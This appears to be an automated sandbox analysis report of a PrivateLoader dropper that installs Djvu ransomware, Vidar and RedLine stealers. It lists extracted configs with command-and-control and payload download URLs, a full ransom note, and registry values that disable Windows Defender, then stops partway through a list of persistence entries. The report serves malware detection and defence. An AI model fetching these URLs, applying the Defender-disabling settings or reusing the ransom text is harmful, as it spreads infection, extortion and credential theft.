Analysis
-
max time kernel
450s -
max time network
453s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
05-07-2022 10:59
Static task
static1
Behavioral task
behavioral1
Sample
faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
Resource
win10v2004-20220414-en
General
-
Target
faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
-
Size
732KB
-
MD5
659ac9c3f3c0fffb292704cb5e7dd699
-
SHA1
a3ee2528280cd762c130f680af08583df22bb435
-
SHA256
faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd
-
SHA512
0b99ae205eb06e39f0befef1c41776cbddda78e674c639eb51968bba4b70aad45cc7b0dbf4ad9bed12a7a82ac31943185b8f59aab082afb15d9b91924889db10
Malware Config
Extracted
privateloader
http://212.193.30.45/proxies.txt
http://85.202.169.116/server.txt
pastebin.com/raw/A7dSG1te
http://wfsdragon.ru/api/setStats.php
85.202.169.116
http://91.241.19.125/pub.php?pub=one
http://sarfoods.com/index.php
http://212.193.30.29/server.txt
212.193.30.21
-
payload_url
http://193.233.185.125/download/NiceProcessX64.bmp
http://193.233.185.125/download/NiceProcessX32.bmp
https://cdn.discordapp.com/attachments/910842184708792331/931507465563045909/dingo_20220114120058.bmp
https://c.xyzgamec.com/userdown/2202/random.exe
http://193.56.146.76/Proxytest.exe
http://www.yzsyjyjh.com/askhelp23/askinstall23.exe
http://privacy-tools-for-you-780.com/downloads/toolspab3.exe
http://luminati-china.xyz/aman/casper2.exe
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr95038215.exe
http://tg8.cllgxx.com/hp8/g1/yrpp1047.exe
https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmp
https://cdn.discordapp.com/attachments/910842184708792331/930850766787330068/real1201.bmp
https://cdn.discordapp.com/attachments/910842184708792331/930882959131693096/Installer.bmp
http://185.215.113.208/ferrari.exe
https://cdn.discordapp.com/attachments/910842184708792331/931233371110141962/LingeringsAntiphon.bmp
https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmp
https://cdn.discordapp.com/attachments/910842184708792331/932720393201016842/filinnn.bmp
https://cdn.discordapp.com/attachments/910842184708792331/933436611427979305/build20k.bmp
https://c.xyzgamec.com/userdown/2202/random.exe
http://mnbuiy.pw/adsli/note8876.exe
http://www.yzsyjyjh.com/askhelp23/askinstall23.exe
http://luminati-china.xyz/aman/casper2.exe
https://suprimax.vet.br/css/fonts/OneCleanerInst942914.exe
http://tg8.cllgxx.com/hp8/g1/ssaa1047.exe
https://www.deezloader.app/files/Deezloader_Remix_Installer_64_bit_4.3.0_Setup.exe
https://www.deezloader.app/files/Deezloader_Remix_Installer_32_bit_4.3.0_Setup.exe
https://cdn.discordapp.com/attachments/910281601559167006/911516400005296219/anyname.exe
https://cdn.discordapp.com/attachments/910281601559167006/911516894660530226/PBsecond.exe
https://cdn.discordapp.com/attachments/910842184708792331/914047763304550410/Xpadder.bmp
http://64.227.67.0/searchApp.exe
Extracted
djvu
http://acacaca.org/test3/get.php
-
extension
.eiur
-
offline_id
JPKXWc5eWNjIicWmQyJxv6NCjbH02qrKi0af9Zt1
-
payload_url
http://rgyui.top/dl/build2.exe
http://acacaca.org/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-aMsnHoiJcO Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0510Usjdjs
Extracted
vidar
53.1
1448
https://t.me/tg_dailyrunnings
https://mastodon.online/@olegf9844g
-
profile_id
1448
Extracted
vidar
53
937
https://t.me/ch_inagroup
https://mastodon.social/@olegf9844e
-
profile_id
937
Extracted
redline
Lyla28.06
185.215.113.16:21921
-
auth_value
de24aa7fc89cb989c29bc8e2697f6d2a
Signatures
-
Detected Djvu ransomware 10 IoCs
Processes:
resource yara_rule behavioral2/memory/3964-236-0x0000000002210000-0x000000000232B000-memory.dmp family_djvu behavioral2/memory/4552-240-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4552-242-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4552-243-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4552-244-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4552-294-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5224-337-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5224-338-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5716-355-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5716-357-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Processes:
faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exes0NrNwyfXpxCyzS03I8CZcLq.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection s0NrNwyfXpxCyzS03I8CZcLq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" s0NrNwyfXpxCyzS03I8CZcLq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" s0NrNwyfXpxCyzS03I8CZcLq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" s0NrNwyfXpxCyzS03I8CZcLq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" s0NrNwyfXpxCyzS03I8CZcLq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" s0NrNwyfXpxCyzS03I8CZcLq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" s0NrNwyfXpxCyzS03I8CZcLq.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe -
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
Processes:
description ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "0" -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
Processes:
description ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" -
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5748 4396 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
Processes:
svchost.exedescription pid process target process PID 5248 created 1624 5248 svchost.exe H4qQ5eq5WgfPy9pgenBRiiaH.exe PID 5248 created 4588 5248 svchost.exe csrss.exe PID 5248 created 4588 5248 svchost.exe csrss.exe PID 5248 created 4588 5248 svchost.exe csrss.exe PID 5248 created 2892 5248 svchost.exe f801950a962ddba14caaa44bf084b55c.exe PID 5248 created 2892 5248 svchost.exe f801950a962ddba14caaa44bf084b55c.exe -
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
-
suricata: ET MALWARE Generic gate .php GET with minimal headers
suricata: ET MALWARE Generic gate .php GET with minimal headers
-
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers
suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers
-
suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer
suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer
-
suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved
suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved
-
suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer
suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer
-
suricata: ET MALWARE Win32/Colibri Loader Activity
suricata: ET MALWARE Win32/Colibri Loader Activity
-
suricata: ET MALWARE Win32/Colibri Loader Activity M2
suricata: ET MALWARE Win32/Colibri Loader Activity M2
-
suricata: ET MALWARE Win32/Colibri Loader Activity M3
suricata: ET MALWARE Win32/Colibri Loader Activity M3
-
suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download
suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download
-
suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key
suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key
-
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload
suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload
-
Vidar Stealer 6 IoCs
Processes:
resource yara_rule behavioral2/memory/2284-258-0x0000000000BB0000-0x0000000000BFD000-memory.dmp family_vidar behavioral2/memory/3244-265-0x0000000000BE0000-0x0000000000C2D000-memory.dmp family_vidar behavioral2/memory/3244-268-0x0000000000400000-0x0000000000A94000-memory.dmp family_vidar behavioral2/memory/2284-259-0x0000000000400000-0x0000000000A96000-memory.dmp family_vidar behavioral2/memory/3244-305-0x0000000000400000-0x0000000000A94000-memory.dmp family_vidar behavioral2/memory/2284-304-0x0000000000400000-0x0000000000A96000-memory.dmp family_vidar -
Blocklisted process makes network request 2 IoCs
Processes:
RunDll32.exerundll32.exeflow pid process 180 4688 RunDll32.exe 280 4832 rundll32.exe -
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
Processes:
1hObAWF58hoo9_jA8jPWtwDx.exeEYGVHMYze8w9bXCxKAs0sRH8.exesd1gX57A0wItT05S8cNnJS6P.exe4AqwIgOuAzGydA7_h8I9ZZtr.exewd1PHHYFXTO2GwSbYNeKiEhd.exejtfXiAYn71DsfeALHUTabEl4.exeFzbLA0y21wf4Eb_GXZGPAkPK.exekdnmdIr2m3Z75rmoxMQY45zR.exeKog456fPoi_qlj0gOuQ1ue72.exeCzOCCnZhsTntOC1DD4Afra50.exeHNYUwmuil6MtmEKe7lmDsMC3.exevl16pz8ikehSoCEiO6vpU86F.exe_az72zCJh0iBWr5dTACKXrws.exel2S7FrWODIlvtiOh9PM4XNlS.exeFnPK_uULTBfwZezEEGCXaVE6.exeH4qQ5eq5WgfPy9pgenBRiiaH.exeTUsKZ9i3PovwwAgsSaLpghkJ.exejtfXiAYn71DsfeALHUTabEl4.exeSETUP_~2.EXEkdnmdIr2m3Z75rmoxMQY45zR.exe_az72zCJh0iBWr5dTACKXrws.exes0NrNwyfXpxCyzS03I8CZcLq.exeM52CB.exeRunDll32.exe0BB4J.exe0BB4J.exekdnmdIr2m3Z75rmoxMQY45zR.exekdnmdIr2m3Z75rmoxMQY45zR.exeEH46E.exekdnmdIr2m3Z75rmoxMQY45zR.exe3A2F1MAI23B9J52.exekdnmdIr2m3Z75rmoxMQY45zR.exebuild2.exesd1gX57A0wItT05S8cNnJS6P.exebuild2.exe50543188494393494002.exebguuwe.exeH4qQ5eq5WgfPy9pgenBRiiaH.exeJu38t3w5U8IOhBMX5rcSC6Nn.exeuw5KPJ6a18gzLPne_F5e0c1_.exemNDcgp0zrWGy_iR_gqWvo4tt.exeBvEl9bplplH_zds3oc3G9TH2.exetmRoymsFOt7qgiIyaQJKTG0D.exe7oi_eeupjsnLrsVJ1cvYAxm7.exeItvrzxmax2.exeBvEl9bplplH_zds3oc3G9TH2.exeInstall.exeInstall.exe0B7121CH132B0JI.execsrss.exeinjector.exe3A8A.exe4A1B.exe4A1B.exe4A1B.exetor.exe4A1B.exe6DF1.exejwzeqsilllyafcnn.exeDllHelper.exebuild2.exe7BCD.exereg.exeIHH9FGG6KIID6CG.exepid process 4436 1hObAWF58hoo9_jA8jPWtwDx.exe 4052 EYGVHMYze8w9bXCxKAs0sRH8.exe 3704 sd1gX57A0wItT05S8cNnJS6P.exe 2948 4AqwIgOuAzGydA7_h8I9ZZtr.exe 1744 wd1PHHYFXTO2GwSbYNeKiEhd.exe 2520 jtfXiAYn71DsfeALHUTabEl4.exe 3244 FzbLA0y21wf4Eb_GXZGPAkPK.exe 3964 kdnmdIr2m3Z75rmoxMQY45zR.exe 1216 Kog456fPoi_qlj0gOuQ1ue72.exe 2712 CzOCCnZhsTntOC1DD4Afra50.exe 3680 HNYUwmuil6MtmEKe7lmDsMC3.exe 4040 vl16pz8ikehSoCEiO6vpU86F.exe 3232 _az72zCJh0iBWr5dTACKXrws.exe 2284 l2S7FrWODIlvtiOh9PM4XNlS.exe 4316 FnPK_uULTBfwZezEEGCXaVE6.exe 1624 H4qQ5eq5WgfPy9pgenBRiiaH.exe 5060 TUsKZ9i3PovwwAgsSaLpghkJ.exe 2020 jtfXiAYn71DsfeALHUTabEl4.exe 4960 SETUP_~2.EXE 4552 kdnmdIr2m3Z75rmoxMQY45zR.exe 3840 _az72zCJh0iBWr5dTACKXrws.exe 1808 s0NrNwyfXpxCyzS03I8CZcLq.exe 2616 M52CB.exe 4688 RunDll32.exe 3784 0BB4J.exe 4204 0BB4J.exe 4324 kdnmdIr2m3Z75rmoxMQY45zR.exe 5224 kdnmdIr2m3Z75rmoxMQY45zR.exe 5536 EH46E.exe 5584 kdnmdIr2m3Z75rmoxMQY45zR.exe 5640 3A2F1MAI23B9J52.exe 5716 kdnmdIr2m3Z75rmoxMQY45zR.exe 4116 build2.exe 3516 sd1gX57A0wItT05S8cNnJS6P.exe 5624 build2.exe 5800 50543188494393494002.exe 3288 bguuwe.exe 3284 H4qQ5eq5WgfPy9pgenBRiiaH.exe 3608 Ju38t3w5U8IOhBMX5rcSC6Nn.exe 968 uw5KPJ6a18gzLPne_F5e0c1_.exe 5344 mNDcgp0zrWGy_iR_gqWvo4tt.exe 5396 BvEl9bplplH_zds3oc3G9TH2.exe 5436 tmRoymsFOt7qgiIyaQJKTG0D.exe 5408 7oi_eeupjsnLrsVJ1cvYAxm7.exe 1424 Itvrzxmax2.exe 5996 BvEl9bplplH_zds3oc3G9TH2.exe 4192 Install.exe 2200 Install.exe 4320 0B7121CH132B0JI.exe 4588 csrss.exe 796 injector.exe 4452 3A8A.exe 1260 4A1B.exe 5340 4A1B.exe 3880 4A1B.exe 6116 tor.exe 6076 4A1B.exe 3204 6DF1.exe 4040 jwzeqsilllyafcnn.exe 3180 DllHelper.exe 4980 build2.exe 3484 7BCD.exe 4052 reg.exe 2596 IHH9FGG6KIID6CG.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe upx C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe upx behavioral2/memory/2020-228-0x0000000000C80000-0x0000000000CD9000-memory.dmp upx C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe upx behavioral2/memory/1624-190-0x0000000000400000-0x0000000000C96000-memory.dmp upx C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe upx behavioral2/memory/2520-167-0x0000000000C80000-0x0000000000CD9000-memory.dmp upx C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe upx behavioral2/memory/2520-285-0x0000000000C80000-0x0000000000CD9000-memory.dmp upx behavioral2/memory/1624-286-0x0000000000400000-0x0000000000C96000-memory.dmp upx -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 23 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
50543188494393494002.exeBvEl9bplplH_zds3oc3G9TH2.exeuw5KPJ6a18gzLPne_F5e0c1_.exeInstall.exe6DF1.exeSETUP_~2.EXEKog456fPoi_qlj0gOuQ1ue72.exeEH46E.exeHNYUwmuil6MtmEKe7lmDsMC3.exe7BCD.exefaae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exel2S7FrWODIlvtiOh9PM4XNlS.exeJu38t3w5U8IOhBMX5rcSC6Nn.exebguuwe.exe4A1B.exesd1gX57A0wItT05S8cNnJS6P.exes0NrNwyfXpxCyzS03I8CZcLq.exeFzbLA0y21wf4Eb_GXZGPAkPK.exe3A8A.exe4A1B.exeEYGVHMYze8w9bXCxKAs0sRH8.exekdnmdIr2m3Z75rmoxMQY45zR.exekdnmdIr2m3Z75rmoxMQY45zR.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation 50543188494393494002.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation BvEl9bplplH_zds3oc3G9TH2.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation uw5KPJ6a18gzLPne_F5e0c1_.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation 6DF1.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation SETUP_~2.EXE Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation Kog456fPoi_qlj0gOuQ1ue72.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation EH46E.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation HNYUwmuil6MtmEKe7lmDsMC3.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation 7BCD.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation l2S7FrWODIlvtiOh9PM4XNlS.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation Ju38t3w5U8IOhBMX5rcSC6Nn.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation bguuwe.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation 4A1B.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation sd1gX57A0wItT05S8cNnJS6P.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation s0NrNwyfXpxCyzS03I8CZcLq.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation FzbLA0y21wf4Eb_GXZGPAkPK.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation 3A8A.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation 4A1B.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation EYGVHMYze8w9bXCxKAs0sRH8.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation kdnmdIr2m3Z75rmoxMQY45zR.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation kdnmdIr2m3Z75rmoxMQY45zR.exe -
Loads dropped DLL 64 IoCs
Processes:
jtfXiAYn71DsfeALHUTabEl4.exeConhost.exel2S7FrWODIlvtiOh9PM4XNlS.exerundll32.exeWerFault.exeFzbLA0y21wf4Eb_GXZGPAkPK.exebuild2.exerundll32.exerundll32.exerundll32.exerundll32.exetor.exeEF2C.exeTal.exe.pifTal.exe.pifpid process 2020 jtfXiAYn71DsfeALHUTabEl4.exe 2020 jtfXiAYn71DsfeALHUTabEl4.exe 2020 jtfXiAYn71DsfeALHUTabEl4.exe 2020 jtfXiAYn71DsfeALHUTabEl4.exe 2020 jtfXiAYn71DsfeALHUTabEl4.exe 2020 jtfXiAYn71DsfeALHUTabEl4.exe 2020 jtfXiAYn71DsfeALHUTabEl4.exe 2020 jtfXiAYn71DsfeALHUTabEl4.exe 2020 jtfXiAYn71DsfeALHUTabEl4.exe 2020 jtfXiAYn71DsfeALHUTabEl4.exe 2020 jtfXiAYn71DsfeALHUTabEl4.exe 2020 jtfXiAYn71DsfeALHUTabEl4.exe 2020 jtfXiAYn71DsfeALHUTabEl4.exe 2020 jtfXiAYn71DsfeALHUTabEl4.exe 2020 jtfXiAYn71DsfeALHUTabEl4.exe 5044 Conhost.exe 5044 Conhost.exe 2284 l2S7FrWODIlvtiOh9PM4XNlS.exe 2284 l2S7FrWODIlvtiOh9PM4XNlS.exe 5156 rundll32.exe 5156 rundll32.exe 5348 WerFault.exe 5348 WerFault.exe 3244 FzbLA0y21wf4Eb_GXZGPAkPK.exe 3244 FzbLA0y21wf4Eb_GXZGPAkPK.exe 3244 FzbLA0y21wf4Eb_GXZGPAkPK.exe 5624 build2.exe 5624 build2.exe 5532 rundll32.exe 5532 rundll32.exe 5512 rundll32.exe 6036 rundll32.exe 6036 rundll32.exe 4832 rundll32.exe 6116 tor.exe 6116 tor.exe 6116 tor.exe 6116 tor.exe 6116 tor.exe 6116 tor.exe 6116 tor.exe 1088 EF2C.exe 1088 EF2C.exe 1088 EF2C.exe 1088 EF2C.exe 1088 EF2C.exe 1088 EF2C.exe 1088 EF2C.exe 1088 EF2C.exe 1088 EF2C.exe 1088 EF2C.exe 1088 EF2C.exe 1088 EF2C.exe 1088 EF2C.exe 1088 EF2C.exe 1088 EF2C.exe 109296 Tal.exe.pif 109144 Tal.exe.pif 109296 Tal.exe.pif 109144 Tal.exe.pif 109144 Tal.exe.pif 109144 Tal.exe.pif 109144 Tal.exe.pif 109296 Tal.exe.pif -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs
Processes:
rundll32.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rundll32.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 13 IoCs
Processes:
0BB4J.exeSETUP_~2.EXEsigned.exeCzOCCnZhsTntOC1DD4Afra50.exekdnmdIr2m3Z75rmoxMQY45zR.exemNDcgp0zrWGy_iR_gqWvo4tt.exeH4qQ5eq5WgfPy9pgenBRiiaH.execsrss.exeFnPK_uULTBfwZezEEGCXaVE6.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe" 0BB4J.exe Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wzocvkk = "\"C:\\Users\\Admin\\AppData\\Roaming\\Okjeqdz\\Wzocvkk.exe\"" SETUP_~2.EXE Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run signed.exe Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Driver Service = "C:\\ProgramData\\MsDrvSrvc.exe" signed.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" CzOCCnZhsTntOC1DD4Afra50.exe Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\72bf7303-5dc0-44e9-87d8-698f8677acab\\kdnmdIr2m3Z75rmoxMQY45zR.exe\" --AutoStart" kdnmdIr2m3Z75rmoxMQY45zR.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce CzOCCnZhsTntOC1DD4Afra50.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce mNDcgp0zrWGy_iR_gqWvo4tt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" 